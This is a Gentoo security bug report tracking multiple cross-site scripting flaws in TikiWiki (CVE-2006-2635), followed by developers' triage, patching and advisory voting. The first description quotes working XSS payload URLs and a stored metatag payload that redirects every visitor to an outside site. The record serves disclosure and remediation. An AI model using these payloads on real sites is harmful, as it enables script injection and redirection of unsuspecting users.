Bug 134483

Summary:	www-apps/tikiwiki: <1.9.3.2 multiple XSS (CVE-2006-2635)
Product:	Gentoo Security	Reporter:	Raphael Marichez (Falco) (RETIRED) <falco>
Component:	Vulnerabilities	Assignee:	Gentoo Security <security>
Status:	RESOLVED FIXED
Severity:	minor	CC:	stepp, web-apps
Priority:	High
Version:	unspecified
Hardware:	All
OS:	Linux
URL:	http://archives.neohapsis.com/archives/bugtraq/2006-05/0565.html
Whiteboard:	B4 [glsa] Falco
Package list:		Runtime testing required:	---

Description Raphael Marichez (Falco) (RETIRED) gentoo-dev

2006-05-27 02:02:25 UTC

Multiple XSS Vulnerabilities in Tikiwiki 1.9.x
 
Discovered by Blwood
http://www.blwood.net
 
 
 
 
** Public **
 
 
-------------
 
Tiki-lastchanges
 
http://www.site.com/tiki-lastchanges.php?days=3&offset=%22%3E%3Cscr%3Cscript%3Eipt%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E
 
http://www.site.com/tikiwiki-1.9.3.1/tiki-lastchanges.php?days=%22%3E%3Csc%3Cscript%3Eript%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E&offset=0&sort_mode=user_desc
 
-------------

Tiki-orphan_pages.php
 
http://www.site.com/tikiwiki-1.9.3.1/tiki-orphan_pages.php?find=%22%3E%3Csc%3Cscript%3Eript%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E&offset=&sort_mode=flag_desc
 
http://www.site.com/tikiwiki-1.9.3.1/tiki-orphan_pages.php?find=&offset=%22%3E%3Csc%3Cscript%3Eript%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E&sort_mode=flag_desc
 
-------------
 
Tiki-listpages.php
 
http://www.site.com/tiki-listpages.php?offset=%22%3E%3Csc%3Cscript%3Eript%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E&sort_mode=creator_desc
 
http://www.site.com/tiki-listpages.php?initial=%22%3E%3Csc%3Cscript%3Eript%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E&sort_mode=pageName_asc
 
-------------
 
Tiki-remind_password.php

http://tikiwiki.org/tiki-remind_password.php

"><scr<script>ipt>alert('Blwood')</scr</script>ipt>
 
-------------
 
 
** Admin **
 
-------------
 
Tiki-admin_include_metatags.php
 
http://www.site.com/tiki-admin.php?page=metatags
 
"><sc<script>ript>alert('Blwood')</scr</script>ipt>
 
In all pages the source will be :
 
<meta name="keywords" content=""><script>alert('Blwood')</script>" />
 
The code will be executed in every pages !
 
Exploit :
 
"><sc<script>ript>document.location='http://www.blwood.net'</scr</script>ipt>
 
-------------
  
(...)
(i don't paste all code)

Comment 1 Stuart Herbert (RETIRED) gentoo-dev

2006-05-31 00:28:09 UTC

Hi,

Hrm ... none of those links work at all :(  I'll have to get tikiwiki setup locally to try and reproduce this problem.

I'll also have a poke around UPSTREAM's cvs repos to see if they've added any unreleased fixes.

Best regards,
Stu

Comment 2 Raphael Marichez (Falco) (RETIRED) gentoo-dev

2006-05-31 01:51:36 UTC

Thanks Stuart;

assigning to "Auditing" then, in order to know if we are vulnerable or not.

Comment 3 Stefan Cornelius (RETIRED) gentoo-dev

2006-06-08 20:20:43 UTC

*** Bug 136108 has been marked as a duplicate of this bug. ***

Comment 4 Raphael Marichez (Falco) (RETIRED) gentoo-dev

2006-06-09 03:01:54 UTC

Handling the tikiwiki issue on this bug.
1.9.3.2 is out now.

Comment 5 Raphael Marichez (Falco) (RETIRED) gentoo-dev

2006-06-09 03:10:07 UTC

adding CVE ref

Comment 6 Renat Lumpau (RETIRED) gentoo-dev

2006-06-09 14:16:13 UTC

in CVS

Comment 7 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev

2006-06-09 23:29:41 UTC

ppc please test and mark stable.

Comment 8 Tobias Scherbaum (RETIRED) gentoo-dev

2006-06-10 01:06:35 UTC

ppc stable.
old vulnerable ebuild removed.

Comment 9 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev

2006-06-10 04:22:33 UTC

I tend to vote NO.

Comment 10 Raphael Marichez (Falco) (RETIRED) gentoo-dev

2006-06-11 14:16:47 UTC

We had already issue GLSA 200510-23 concerning a TikiWiki XSS.
Should we follow the history or change it ?

Comment 11 Thierry Carrez (RETIRED) gentoo-dev

2006-06-13 13:26:35 UTC

I usually tend to vote yes for XSS in wikis... but only if you can actually post things with active code in it, not just follow lame links. So I vote NO.

Comment 12 Wolf Giesen (RETIRED) gentoo-dev

2006-06-13 13:47:33 UTC

In my understanding you can inject arbitrary JavaScript. If that is true I vote YES.

Comment 13 Raphael Marichez (Falco) (RETIRED) gentoo-dev

2006-06-13 17:00:00 UTC

Voting No and closing. Feel free to reopen if you disagree.

Furthermore, another security update (1.9.3.4) has just been issued, see bug 136723, which is probably a little bit more serious (SQL injection and XSS).

Comment 14 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev

2006-06-14 09:41:55 UTC

Reopening to be included with bug #136723.

Comment 15 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev

2006-06-28 23:08:47 UTC

GLSA 200606-29